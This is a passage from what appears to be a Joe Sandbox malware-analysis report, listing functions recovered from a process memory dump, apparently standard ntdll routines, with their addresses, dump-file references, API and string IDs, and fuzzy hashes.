                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                • API String ID: 3446177414-56086060
                                                                                                • Opcode ID: 6e2649f3b8834998fabbeecfe94a769125846769bc035fd85398108243e0d061
                                                                                                • Instruction ID: a2400418658f6864cc4865642a43938ca677ab215846c304b870d4b46f425fc5
                                                                                                • Opcode Fuzzy Hash: 6e2649f3b8834998fabbeecfe94a769125846769bc035fd85398108243e0d061
                                                                                                • Instruction Fuzzy Hash: DD414671A00341DFDB22DF69C484B6ABFA5EF11724F1440AFE9458B7B2C774A889CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014B4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • LdrpCheckRedirection, xrefs: 014B488F
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 014B4899
                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014B4888
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 3446177414-3154609507
                                                                                                • Opcode ID: 75131afd21721d2f1666ebae35d81ec02d3c8ee72f4b0df8ac937d0e5970c6e6
                                                                                                • Instruction ID: 42f8e3af15fb4efa5866a76cc194f9b5421051ac7113aa2ab28e196cb8ef59f6
                                                                                                • Opcode Fuzzy Hash: 75131afd21721d2f1666ebae35d81ec02d3c8ee72f4b0df8ac937d0e5970c6e6
                                                                                                • Instruction Fuzzy Hash: 8541C436A046519BCB21CE5DD8C0AA77BE4AF49650B0E056FED5A9B373D730D801CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0145DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                • API String ID: 3446177414-3526935505
                                                                                                • Opcode ID: 11b41859210970b469e3afb167ae686f5ced96aafcb18be70cd6e695a914d310
                                                                                                • Instruction ID: 24991b65fb5148d3154191351046284f78e897ee84b54e330404e79d2bf27f6e
                                                                                                • Opcode Fuzzy Hash: 11b41859210970b469e3afb167ae686f5ced96aafcb18be70cd6e695a914d310
                                                                                                • Instruction Fuzzy Hash: 7031F431604790DFDB239B69C409B5A7FE4EF11650F14409FE8528B7B2C7B8A889CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0142C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: $
                                                                                                • API String ID: 3446177414-3993045852
                                                                                                • Opcode ID: 9aea3eb865c52fc0fde4a713a666ea4a15ed7b0a94fb9e1a151f203f3e13cfa5
                                                                                                • Instruction ID: ebd526e877e969d70ea888be337dc2e8cdebb3393fca9630e86d37aa54d7ae21
                                                                                                • Opcode Fuzzy Hash: 9aea3eb865c52fc0fde4a713a666ea4a15ed7b0a94fb9e1a151f203f3e13cfa5
                                                                                                • Instruction Fuzzy Hash: 5D118E32A01218EBCF25AF95E848A9D7B71FF55364F10811AFC2A6B2E0CB315A00DB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0145EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c6c0e65194af8722c4803f942c3c06dccc997a9f71600dfa700a49218f0c3a8
                                                                                                • Instruction ID: 2b0eabe67aeaa6761eff68252cfdfb59777e163cb8d135c09148d3b884329b1a
                                                                                                • Opcode Fuzzy Hash: 2c6c0e65194af8722c4803f942c3c06dccc997a9f71600dfa700a49218f0c3a8
                                                                                                • Instruction Fuzzy Hash: F3E111B1D00608DFCF65CFA9D980AAEBBF1BF48300F24452AE946A7362D770A845CF11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014AEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                • Opcode ID: 23b27f94a7b81872f8fdfc1136a3f1c7a133c7355d42201eab14eeadb0a0b953
                                                                                                • Instruction ID: dc275fa257d5234ce7e64a01cad6b8f8b12fd1bb38d3e69e05a84a49b17c9efa
                                                                                                • Opcode Fuzzy Hash: 23b27f94a7b81872f8fdfc1136a3f1c7a133c7355d42201eab14eeadb0a0b953
                                                                                                • Instruction Fuzzy Hash: 8E714772E00219AFDF05CFA5C984ADDBBB5BF58314F56402AE905BB364D734A909CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014AF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                • Opcode ID: 7e302a28065f8263a959f08c87070072451662fce08224e36ce02c32f598b274
                                                                                                • Instruction ID: ecd9c98569792f11460f3a2ce811ac711c000c2a59ba38899f2b900e72ccfa69
                                                                                                • Opcode Fuzzy Hash: 7e302a28065f8263a959f08c87070072451662fce08224e36ce02c32f598b274
                                                                                                • Instruction Fuzzy Hash: A0515572E002199FDF09CF99C844ADDBBF1BF58314F56802AE915BB260D734A909CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01467B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                • String ID:
                                                                                                • API String ID: 4281723722-0
                                                                                                • Opcode ID: 86f0fdee166f406edb5dd1f3f6b8651462222f6738d41349ee8ad0f595ce2362
                                                                                                • Instruction ID: 335f0424d5b43230878997ac1d31700fc2e209fd7997df740060e6e7874abdd0
                                                                                                • Opcode Fuzzy Hash: 86f0fdee166f406edb5dd1f3f6b8651462222f6738d41349ee8ad0f595ce2362
                                                                                                • Instruction Fuzzy Hash: AA313476E002299FCF21DFA9D844A9EBBF0FB59320F25412AE921BB3A0D7715901CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014359C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 05323319d9ababc883fc5a43ae4a8716bd33b245b867516cd8256320bbfe3414
                                                                                                • Instruction ID: e8a4f1f3374fc342a007788814c07eb83af7949b59561249eb0d7def054af992
                                                                                                • Opcode Fuzzy Hash: 05323319d9ababc883fc5a43ae4a8716bd33b245b867516cd8256320bbfe3414
                                                                                                • Instruction Fuzzy Hash: 96326970D0026ADFDB25CF69C844BEEBBB4BF58314F0081EAD549AB261D7749A85CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01477D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-
                                                                                                • API String ID: 1302938615-2137968064
                                                                                                • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                • Instruction ID: b5db85abc816f23bb0c7b064544c893a9464baf8e79fb63136f2e398f799d503
                                                                                                • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                • Instruction Fuzzy Hash: 3C91D270E002069BEB24CF6DC998AFFBBA5EF44322F94491BE955E73E0D73089418B50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0144D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: Bl$l
                                                                                                • API String ID: 3446177414-208461968
                                                                                                • Opcode ID: 36683a553144211d12e3a8d85979056c91c40a0fc12f775f6ee8ae6d621efa4f
                                                                                                • Instruction ID: 3b3a18a8f9a82f55b6fd69f6ce20bf470d7f551548391d9d9fceb8920fcd899f
                                                                                                • Opcode Fuzzy Hash: 36683a553144211d12e3a8d85979056c91c40a0fc12f775f6ee8ae6d621efa4f
                                                                                                • Instruction Fuzzy Hash: 22A1B331E003298BFB31DF99C890BAAB7A1BB65704F0540EBD90967361DB74AE85CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01475DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 01475E34
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: 4dd04533d829fda1ecde41ecaf186af5256771943df37ed8a5320e95299743d7
                                                                                                • Instruction ID: dfae9419d01eba905debe2aa697b6931e2d743a43dacbda14a529c61a141fa56
                                                                                                • Opcode Fuzzy Hash: 4dd04533d829fda1ecde41ecaf186af5256771943df37ed8a5320e95299743d7
                                                                                                • Instruction Fuzzy Hash: 20513A7190820696DB22B72CD9153EF3B94EB40760F14CD5FE4E58E3B9EB3484D68B86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01464C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$Flst
                                                                                                • API String ID: 0-758220159
                                                                                                • Opcode ID: 1eb582581fb9b2edd43629db31fb1c1214e0016576c4bb92227ab514e674fcc5
                                                                                                • Instruction ID: 7d2109bf193780d6f64a049b88fa8a9be98e81351554a2c31c2ca2f591fa2060
                                                                                                • Opcode Fuzzy Hash: 1eb582581fb9b2edd43629db31fb1c1214e0016576c4bb92227ab514e674fcc5
                                                                                                • Instruction Fuzzy Hash: F4518AB1E002148FDF26DF99D48466EFBF8FF64718F59802AD0499B261E7709986CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0145D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlDebugPrintTimes.NTDLL ref: 0145D959
                                                                                                  • Part of subcall function 01434859: RtlDebugPrintTimes.NTDLL ref: 014348F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: $$$
                                                                                                • API String ID: 3446177414-233714265
                                                                                                • Opcode ID: 9053f3f6cd6a59e262dd5e5f4e6536def3325df914135cb87d7ec227e19d12d6
                                                                                                • Instruction ID: abafa76918bbb0cc5333c2635999f1f387d36b5b768fd66988cc2821a67c8161
                                                                                                • Opcode Fuzzy Hash: 9053f3f6cd6a59e262dd5e5f4e6536def3325df914135cb87d7ec227e19d12d6
                                                                                                • Instruction Fuzzy Hash: 52511472E003469FDB64DFE9C48479EBBB1BF59314F24405EC8256B3A2D770998ACB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014AFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: $
                                                                                                • API String ID: 3446177414-3993045852
                                                                                                • Opcode ID: 84d072dd314072991c54eb0d7c524a2a5868504e08ebaa43d3d2966c1036fcee
                                                                                                • Instruction ID: 815a5924238a8a5e311a7158b93af070c97d1e26b57151fc7dd7564bbca43e52
                                                                                                • Opcode Fuzzy Hash: 84d072dd314072991c54eb0d7c524a2a5868504e08ebaa43d3d2966c1036fcee
                                                                                                • Instruction Fuzzy Hash: 6241C0B5A01209ABCF21DF99C880AEFBBB5FF58714F56011AEE04A7361C7709905DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0142DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
